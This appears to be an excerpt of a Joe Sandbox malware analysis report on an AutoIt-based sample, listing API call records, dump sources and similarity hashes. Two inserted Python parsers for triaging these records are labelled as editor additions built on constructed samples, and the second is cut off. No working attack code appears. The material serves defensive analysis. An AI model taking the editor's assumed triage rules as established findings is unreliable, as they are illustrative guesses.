• Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
• Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
• Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
• Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
• Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
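The function records above are useful beyond reading them one at a time: the "APIs" bullets are a per-function call sequence, and a few of these sequences are recognisable primitives (GetWindowThreadProcessId + GetCurrentThreadId + AttachThreadInput attaches the caller's input queue to a foreign window's thread; WaitForSingleObject followed by UnloadUserProfile is the clean-up after running something under a loaded profile; GetDeviceCaps with index 0xC reads BITSPIXEL and 0x74 reads VREFRESH of the desktop DC). The following Python parser is an added example by the editor, not part of the Joe Sandbox report or of the sample's own code. It parses three records copied from this page (the sample text is constructed for the example), keeps "Part of subcall function" calls separate from the function's own calls, and runs a small set of editor-defined triage rules over them; the rule names and their wording are the editor's assumptions, and the GetDeviceCaps index table covers only a handful of well-known values.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: three records copied from this report, in the shape the
# Joe Sandbox IDA plugin prints them. Only the lines the parser uses are kept.
SAMPLE = """\
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
"""

# One "• Api.MODULE(args), ref: ADDR" bullet; the "(args)" part and the comma
# are optional (see GetCurrentThreadId.KERNEL32 ref: ... above).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str                      # address of the call site
    subcall_of: Optional[str]     # callee address when listed as "Part of subcall"


@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""

    def direct(self) -> List[Call]:
        """Calls made by the function itself, excluding inlined subcall listings."""
        return [c for c in self.calls if c.subcall_of is None]


def parse_records(text: str) -> List[Record]:
    """Split the report text into one Record per 'APIs' block."""
    records: List[Record] = []
    cur: Optional[Record] = None
    for line in text.splitlines():
        s = line.strip().lstrip("•").strip()
        if s == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args") or ""
            cur.calls.append(Call(m["api"], m["mod"], raw.split(",") if raw else [], m["ref"], m["sub"]))
        elif s.startswith("API ID: "):
            cur.api_id = s[len("API ID: "):]
        elif s.startswith("Instruction Fuzzy Hash: "):
            cur.fuzzy_hash = s.split(": ", 1)[1]
    return records


# Well-known GetDeviceCaps indices (subset; anything else is echoed as hex).
DEVICECAPS = {0x08: "HORZRES", 0x0A: "VERTRES", 0x0C: "BITSPIXEL",
              0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY", 0x74: "VREFRESH"}


def decode_devicecaps(index: int) -> str:
    return DEVICECAPS.get(index, f"0x{index:X}")


# Editor-defined triage rules (assumptions about what the sequences mean).
ATTACH_INPUT = {"GetWindowThreadProcessId", "GetCurrentThreadId", "AttachThreadInput"}
PROFILE_UNLOAD = {"WaitForSingleObject", "UnloadUserProfile"}


def triage(records: List[Record]) -> List[Tuple[str, str, str]]:
    """Return (address, tag, description) findings for recognised sequences."""
    findings = []
    for rec in records:
        direct = rec.direct()
        names = {c.api for c in direct}
        if ATTACH_INPUT <= names:
            findings.append((direct[0].ref, "attach_thread_input",
                             "attaches caller's input queue to a foreign window's thread"))
        if PROFILE_UNLOAD <= names:
            findings.append((direct[0].ref, "user_profile_unload",
                             "waits on a handle, then unloads a loaded user profile"))
        for c in direct:
            if c.api == "GetDeviceCaps" and len(c.args) == 2:
                try:
                    idx = int(c.args[1], 16)
                except ValueError:      # argument shown as "?" in the report
                    continue
                findings.append((c.ref, "device_caps", f"reads {decode_devicecaps(idx)} of the desktop DC"))
    return findings


if __name__ == "__main__":
    for ref, tag, desc in triage(parse_records(SAMPLE)):
        print(f"{ref} {tag:<22} {desc}")
```

Feeding the full report text instead of SAMPLE works unchanged, since the parser only keys on the "APIs", "API ID" and "Instruction Fuzzy Hash" lines; the fuzzy hash is kept on each record so matches can be carried over to other samples sharing the same runtime code.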
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _strncmp
• String ID: Q\E
• API String ID: 909875538-2189900498
• Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
• Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                        APIs
                                                                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                        • API String ID: 2652923123-3941886329
                                                                                                        • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                        • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove_strncmp
                                                                                                        • String ID: U$\
                                                                                                        • API String ID: 2666721431-100911408
                                                                                                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                        • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                        • String ID: LPT
                                                                                                        • API String ID: 3035604524-1350329615
                                                                                                        • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                        • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \$h
                                                                                                        • API String ID: 4104443479-677774858
                                                                                                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memcmp
                                                                                                        • String ID: &
                                                                                                        • API String ID: 2931989736-1010288
                                                                                                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \
                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 00466825
                                                                                                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                        • String ID: |
                                                                                                        • API String ID: 596671847-2343686810
                                                                                                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
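The per-function records in this section all follow one fixed layout: an APIs block (direct calls written as Name.MODULE(args), ref: ADDR, nested calls prefixed with "Part of subcall function ADDR:"), an optional Strings block, the memory-dump provenance, the IDA plugin snapshot, and the Similarity fields (API ID, String ID, fuzzy hashes). When triaging a report this long it is far quicker to parse those records than to scroll them, for instance to pull out every function that reaches WNetUseConnectionW (the record with String ID LPT above) or InternetCrackUrlW (the record just above), or to bucket functions by Instruction Fuzzy Hash. The parser below is an added example and is not part of the Joe Sandbox report or its tooling; the input is a constructed excerpt of those two records copied from this section and trimmed to one memory-dump line each, and the watch list of API names passed to find_calls is an arbitrary choice for illustration.

```python
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt: two function records copied from this report's disassembly
# section (the WNetUseConnectionW and InternetCrackUrlW functions), trimmed to one
# memory-dump line each.  The line layout is the report's own.
SAMPLE = """\
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT
• API String ID: 3035604524-1350329615
• Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
APIs
• _wcslen.LIBCMT ref: 00466825
• InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Matches "Name.MODULE(args), ref: ADDR" as well as the argument-less "Name.MODULE ref: ADDR".
CALL_RE = re.compile(r"(?P<name>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
SUBCALL_RE = re.compile(r"Part of subcall function (?P<parent>[0-9A-F]{8}): (?P<rest>.+)$")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                      # address of the call site
    args: list[str]               # "?" marks an argument the analyzer could not resolve
    parent: Optional[str] = None  # callee address when the call is a "Part of subcall" line


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)  # dump source, snapshot and Similarity fields

    def direct_apis(self) -> list[str]:
        return [a.name for a in self.apis if a.parent is None]


def _parse_call(text: str, parent: Optional[str]) -> Optional[ApiCall]:
    m = CALL_RE.match(text)
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") is not None else []
    return ApiCall(m.group("name"), m.group("mod"), m.group("ref"), args, parent)


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the report text into records; each record begins at its own 'APIs' header."""
    records: list[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                records.append(FunctionRecord())
            section = line
            continue
        if not line or not records:
            continue
        line = line.lstrip("•").strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(line)
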